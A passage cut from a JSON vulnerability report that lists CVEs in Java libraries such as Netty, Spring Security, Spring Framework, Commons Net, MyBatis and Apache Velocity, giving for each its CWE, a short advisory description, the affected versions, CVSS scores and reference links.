cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"]}],"title":"CVE-2021-37137/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37136"]}],"cve":"CVE-2021-37136","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:21","ids":[{"system_name":"CVE Record","text":"CVE-2021-37136"},{"system_name":"GitHub Advisory","text":"GHSA-grg4-wf29-r9vv"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bzip2Decoder doesn't allow setting size restrictions for decompressed data"},{"category":"details","details":"Vulnerability Details","text":"# Bzip2Decoder doesn't allow setting size restrictions for decompressed data ### Impact The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).   All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack  ### Workarounds No workarounds other than not using the `Bzip2Decoder`  ### References  Relevant code areas:  https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-grg4-wf29-r9vv","url":"https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-37136/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34462"]}],"cve":"CVE-2023-34462","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-06-20T16:33:22","ids":[{"system_name":"CVE Record","text":"CVE-2023-34462"},{"system_name":"GitHub Advisory","text":"GHSA-6mjq-h674-j845"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"NetApp Advisory","text":"ntap-20230803-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"category":"description","details":"Vulnerability Description","text":"netty-handler SniHandler 16MB allocation"},{"category":"details","details":"Vulnerability Details","text":"# netty-handler SniHandler 16MB allocation ### Summary The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.  ### Details The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record.   Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`  1/ allocate a 16MB `ByteBuf` 2/ not fail `decode` method `in` buffer 3/ get out of the loop without an exception  The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.  ### Impact If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS."}],"product_status":{"known_affected":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]},"references":[{"summary":"GitHub Advisory GHSA-6mjq-h674-j845","url":"https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"NetApp Advisory ntap-20230803-0001","url":"https://security.netapp.com/advisory/ntap-20230803-0001"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]}],"title":"CVE-2023-34462/pkg:maven/io.netty/netty-handler@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2021-22112"]}],"cve":"CVE-2021-22112","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2021-05-10T15:22:39","ids":[{"system_name":"CVE Record","text":"CVE-2021-22112"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Vmware Advisory","text":"cve-2021-22112"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Privilege escalation in spring security"},{"category":"details","details":"Vulnerability Details","text":"# Privilege escalation in spring security Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application."}],"product_status":{"known_affected":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/02/19/7"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2cb05e499807900ba23e539643eead9c5f0652fd271f223f89da1804@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r37423ec7eea340e92a409452c35b649dce02fdc467f0b3f52086c177@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r413e380088c427f56102968df89ef2f336473e1b56b7d4b3a571a378@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra6389b1b82108a3b6bbcd22979f7665fd437c2a3408c9509a15a9ca1@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbd004a503b3520ae5746c2ab5e93fd7da807a8c128e60d2002cd9b@%3Cissues.nifi.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Vmware Advisory cve-2021-22112","url":"https://tanzu.vmware.com/security/cve-2021-22112"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]}],"title":"CVE-2021-22112/pkg:maven/org.springframework.security/spring-security-web@4.2.12.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-5408"]}],"cve":"CVE-2020-5408","cwe":{"id":"329","name":"Generation of Predictable IV with CBC Mode"},"discovery_date":"2020-06-15T19:34:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-5408"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Vmware Advisory","text":"cve-2020-5408"}],"notes":[{"audience":"developers","category":"other","text":"Use of Insufficiently Random Values","title":"Additional CWE: 330"},{"category":"description","details":"Vulnerability Description","text":"Insufficient Entropy in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Insufficient Entropy in Spring Security Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Vmware Advisory cve-2020-5408","url":"https://tanzu.vmware.com/security/cve-2020-5408"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]}],"title":"CVE-2020-5408/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22978"]}],"cve":"CVE-2022-22978","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-05-20T00:00:39","ids":[{"system_name":"CVE Record","text":"CVE-2022-22978"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22978"},{"system_name":"NetApp Advisory","text":"ntap-20220707-0003"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Authorization bypass in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Authorization bypass in Spring Security In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"NetApp Advisory ntap-20220707-0003","url":"https://security.netapp.com/advisory/ntap-20220707-0003"},{"summary":"Cve 2022","url":"https://spring.io/security/cve-2022-22978"},{"summary":"Vmware Advisory cve-2022-22978","url":"https://tanzu.vmware.com/security/cve-2022-22978"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]}],"title":"CVE-2022-22978/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22970"]}],"cve":"CVE-2022-22970","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-05-13T00:00:28","ids":[{"system_name":"CVE Record","text":"CVE-2022-22970"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22970"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Denial of service in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Denial of service in Spring Framework In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object."}],"product_status":{"known_affected":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"NetApp Advisory ntap-20220616-0006","url":"https://security.netapp.com/advisory/ntap-20220616-0006"},{"summary":"Vmware Advisory cve-2022-22970","url":"https://tanzu.vmware.com/security/cve-2022-22970"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22970/pkg:maven/org.springframework/spring-beans@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22968"]}],"cve":"CVE-2022-22968","cwe":{"id":"178","name":"Improper Handling of Case Sensitivity"},"discovery_date":"2022-04-15T00:00:32","ids":[{"system_name":"CVE Record","text":"CVE-2022-22968"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22968"},{"system_name":"NetApp Advisory","text":"ntap-20220602-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper handling of case sensitivity in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Improper handling of case sensitivity in Spring Framework In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue."}],"product_status":{"known_affected":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"NetApp Advisory ntap-20220602-0004","url":"https://security.netapp.com/advisory/ntap-20220602-0004"},{"summary":"Vmware Advisory cve-2022-22968","url":"https://tanzu.vmware.com/security/cve-2022-22968"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22968/pkg:maven/org.springframework/spring-context@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37533"]}],"cve":"CVE-2021-37533","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-03T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2021-37533"},{"system_name":"Apache Advisory","text":"NET-711"},{"system_name":"Debian Advisory","text":"dsa-5307"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Commons Net vulnerable to information leakage via malicious server"},{"category":"details","details":"Vulnerability Details","text":"# Apache Commons Net vulnerable to information leakage via malicious server Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711."}],"product_status":{"known_affected":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/12/03/1"},{"summary":"Apache Advisory NET-711","url":"https://issues.apache.org/jira/browse/NET-711"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"Debian Advisory dsa-5307","url":"https://www.debian.org/security/2022/dsa-5307"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]}],"title":"CVE-2021-37533/pkg:maven/commons-net/commons-net@3.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26945"]}],"cve":"CVE-2020-26945","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-04-22T16:14:38","ids":[{"system_name":"CVE Record","text":"CVE-2020-26945"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\"Deserialization errors in MyBatis\""},{"category":"details","details":"Vulnerability Details","text":"# \"Deserialization errors in MyBatis\" MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning."}],"product_status":{"known_affected":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"],"known_not_affected":["org.mybatis/mybatis@3.5.6"]},"references":[{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"]}],"title":"CVE-2020-26945/pkg:maven/org.mybatis/mybatis@3.4.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13936"]}],"cve":"CVE-2020-13936","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-06T20:32:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-13936"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Gentoo Advisory","text":"glsa-202107-52"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Sandbox Bypass in Apache Velocity Engine"},{"category":"details","details":"Vulnerability Details","text":"# Sandbox Bypass in Apache Velocity Engine An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2."}],"product_status":{"known_affected":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/10/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a%40%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing 